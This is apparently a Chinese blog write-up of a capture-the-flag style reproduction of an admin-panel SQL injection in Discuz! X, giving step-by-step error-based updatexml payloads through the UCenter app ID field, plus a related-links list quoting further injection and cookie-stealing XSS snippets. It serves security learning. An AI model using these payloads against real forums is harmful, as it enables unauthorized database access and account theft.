Discuz! X系列全版本后台sql注入漏洞

于 2023-10-15 12:40:03 发布
阅读量300 收藏
点赞数
分类专栏: web安全 # SQL注入 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53303754/article/details/133841207
版权

Discuz! X系列全版本后台sql注入漏洞

1、先访问如下链接。

http://ip/DiscuzX/upload/admin.php

通过账号/密码:admin/admin进入后台,点击站长–UCenter设置,sql注入存在位置在UCenter 应用 ID

1后后面输入 ‘ ,点击最下面的提交并进行抓包

2、

1’ and updatexml(1,concat(0x7e,(SELECT user())),1)-- a //查询当前用户

3、

1’ and updatexml(1,concat(0x7e,(SELECT version())),1)-- a //查询当前版本

4、

1’ and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),1)-- a //查询数据库并得到flag

flag{sssddaz!!}

Mamba-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Discuz! 系列<=3.4 后台 sql注入漏洞
weixin_46801402的博客
07-29 4231
Discuz!X版本存在SQL注入漏洞漏洞产生的原因是source\admincp\admincp_setting.php在处理$settingnew['uc']['appid']参数时未进行完过滤,导致出现二次注入。在特定条件下,攻击者可以利用该漏洞获取服务器权限。...
discuzSQL注入
05-18
防止sql注入,使用的时候,在一个总的配置文件里用这段代码.
php discuzSQL注入_discuz的php防止sql注入函数
weixin_35020639的博客
03-08 94
最近在做一个主题投票网站,客户懂一些程序方面的东西。有特别要求需要过滤一些字符防止sql注入。本来这方面就没有特别的研究过。呵呵,又发扬了一回拿来主义。把discuz论坛的sql防注入函数取了来!复制代码 代码如下:$magic_quotes_gpc = get_magic_quotes_gpc();@extract(daddslashes($_COOKIE));@extract(daddslas...
php discuzSQL注入_Discuz7.2版的faq.php SQL注入漏洞分析
weixin_39866867的博客
03-08 129
这篇文章主要介绍了Discuz7.2版的faq.php SQL注入漏洞分析,包含注入代码和源码分析,需要的朋友可以参考下注入代码实例://www.jb51.net/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select ...
discuz 7.2 SQL 注入漏洞分析
weixin_33860722的博客
01-28 601
2019独角兽企业重金招聘Python工程师标准>>> ...
discuz的php防止sql注入函数
come_on_air的专栏
01-11 2310
最近在做一个主题投票网站,客户懂一些程序方面的东西。有特别要求需要过滤一些字符防止sql注入。本来这方面就没有特别的研究过。呵呵,又发扬了一回拿来主义。把discuz论坛的sql防注入函数取了来!  [php] view plaincopy $magic_quotes_gpc = get_magic_quotes_gpc();    @extract(
discuz nt 3.5.2 sqlserver版本
11-09
NT 3.5.2内置了安防护机制,如SQL注入防御、XSS跨站脚本攻击防护等,确保用户数据的安。 4. 功能丰富:具备论坛、门户、空间、群组等多种社区模块,满足不同用户需求,同时支持自定义插件和模板,方便扩展功能...
dz 所有版本后台GET SHELL1
08-08
因为`identifier`是从`plugins`表中读取的,攻击者可以利用SQL注入漏洞,将单引号不被转义的特点来构造恶意数据。由于直接修改文件的风险较高,作者提出了利用导入插件功能的方法。创建一个新的插件,将`identifier`...
Discuz_X1.5.1简体中文版
01-10
4. **安管理**:加强了安防护机制,包括防止SQL注入、XSS攻击等,保障用户数据安。 5. **界面优化**:采用简洁明快的界面设计,提高用户体验,同时支持自定义模板,满足个性化需求。 二、主要组件 1. **...
Discuz-x3.4-master.zip
05-28
3. **增强的安性**:内置多重安防护机制,包括防止SQL注入、XSS攻击等,确保社区论坛的安稳定。 4. **丰富的插件和模板**:Discuz! X3.4提供了众多官方和第三方的插件及模板,用户可以根据需求进行扩展和个性...
Discuz! 安蓝色
12-07
在网络安日益重要的今天,一款安的论坛模板至关重要,它可以保护用户数据不被非法获取,防止SQL注入、XSS攻击等常见网络安问题。而“蓝色”通常与专业、稳定、信任感相联系,这样的设计选择可能旨在为用户提供...
php discuzSQL注入_php防止sql注入函数(discuz)
weixin_39574287的博客
03-08 91
/*函数名称:inject_check()函数作用:检测提交的值是不是含有SQL注射的字符,防止注射,保护服务器安参  数:$sql_str: 提交的变量 www.jbxue.com返 回 值:返回检测结果,ture or false*/function inject_check($sql_str) {return eregi('select|insert|and|or|update|delet...
Discuz 7.2/X1 第三方插件SQL注入及持久型XSS漏洞
swordheart的博客
04-18 4756
漏洞详情 披露状态: 2010-07-31: 细节已通知厂商并且等待厂商处理中 2010-08-01: 厂商已经确认,细节仅向厂商公开 2010-08-11: 细节向核心白帽子及相关领域专家公开 2010-08-21: 细节向普通白帽子公开 2010-08-31: 细节向实习白帽子公开 2010-08-31: 细节向公众公开 简要描述: Discuz!7.2/X1 第三方插件SQL注入及持久型XSS漏洞SQL注入比较鸡肋,要求GPC为off(目前这样的网站几乎绝版了) XSS因为是持久型的,只要
漏洞复现-DiscuzX 系列版本后台SQL注入漏洞
qq_59350385的博客
05-10 1531
目录 环境搭建 (1)源码下载: 漏洞检测 报错注入 写文件 漏洞分析 环境搭建 (1)源码下载: https://search.gitee.com/?skin=rec&type=repository&q=discuz git clonehttp://htts://gite.com/ComsenzDiscuzX.git 放置于web根目录,访问即可进入安装页面 (2)也可搭建vulhub靶场,启动discuz环境 漏洞检测 http://.....
7.2 discuz 拿shell_discuz 7.2 SQL 注入漏洞分析
weixin_39852647的博客
12-22 436
1、漏洞影响范围该漏洞影响discuz 7.2,discuz 7.2可以从http://www.comsenz.com/downloads/install/discuz下载2、漏洞成因分析漏洞存在于discuz根目录的faq.php文件,当程序使用$_GET,$_POST, $_COOKIES传入参数,faq.php,包含的./include/common.inc.php文件中会对这几个对象做处理...
Discuz!X系列版本后台sql注入复现
浅笑996的博客
06-28 3081
圈子某位大佬公布的0day,拿来刷一刷,漏洞分析请移步大佬文章。大佬链接 0x01 环境准备 1、首先去码云下载最新版本discuzDiscuzX 3.4 R20191201)。 2、将upaod放置到网站目录下,访问安装目录安装即可。 0x02 漏洞复现 点击站长--UCenter设置 点击最下面的提交进行抓包 判断列数 1' order by 1 //返回正确 1' order by 2 //返回错误 查询当前用户 1' and updatexml(.
Discuz x2 XSS漏洞
pygain的博客
10-31 3661
Discuz x2 cms 针对拥有编辑权限的管理员存在储存型xss,构造合理的payload可拿到管理员cookie payload: [align="onmouseover="alert(1)];
Discuz X 系列版本 后台Sql注入漏洞
bulangman277的博客
12-28 3500
Discuz! X 系列版本 后台Sql注入漏洞
discuz7.2 sql注入漏洞
最新发布
06-02
Discuz! 7.2曾经存在SQL注入漏洞,这个漏洞是由于程序没有充分过滤用户输入的数据而导致的。攻击者可以通过构造特定的SQL语句来绕过程序的验证和过滤,从而获取到系统中的敏感数据。 为了避免这个漏洞,建议用户及时升级到最新版本Discuz!,同时也应该加强系统的安防护措施,如限制数据库用户权限、开启防火墙等。此外,还可以通过对用户输入数据进行严格的过滤和验证来避免SQL注入漏洞的发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值